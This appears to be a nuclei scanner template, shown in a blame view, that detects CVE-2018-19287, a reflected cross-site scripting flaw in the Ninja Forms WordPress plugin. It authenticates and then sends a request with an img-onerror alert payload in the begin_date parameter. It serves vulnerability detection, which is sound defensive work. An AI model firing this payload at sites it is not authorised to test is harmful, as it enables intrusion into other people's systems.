nuclei-templates/cves/2018/CVE-2018-19287.yaml

50 lines
1.4 KiB
YAML
Raw Normal View History

2022-10-13 10:28:46 +00:00
id: CVE-2018-19287
info:
2022-10-14 11:50:36 +00:00
name: Ninja Forms <= 3.3.17 - Cross-Site Scripting
2022-10-13 10:28:46 +00:00
author: theamanrawat
severity: medium
2022-10-13 18:21:30 +00:00
description: |
XSS in the Ninja Forms plugin before 3.3.18 for WordPress allows Remote Attackers to execute JavaScript.
2022-10-13 10:28:46 +00:00
reference:
2022-10-13 18:21:30 +00:00
- https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7
2022-10-13 10:28:46 +00:00
- https://wordpress.org/plugins/ninja-forms/
- https://www.exploit-db.com/exploits/45880
- https://nvd.nist.gov/vuln/detail/CVE-2018-19287
classification:
cve-id: CVE-2018-19287
metadata:
2022-10-13 18:21:30 +00:00
verified: true
tags: cve,cve2018,wp-plugin,ninja-forms,wordpress,wp,xss,authenticated
2022-10-13 10:28:46 +00:00
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
2022-10-13 18:21:30 +00:00
part: body_2
2022-10-13 10:28:46 +00:00
words:
- 'Begin Date" value="\"><img src=x onerror=alert(document.domain);//">'
2022-10-13 18:21:30 +00:00
- type: word
part: header_2
words:
- text/html
2022-10-13 10:38:20 +00:00
- type: status
2022-10-13 10:28:46 +00:00
status:
- 200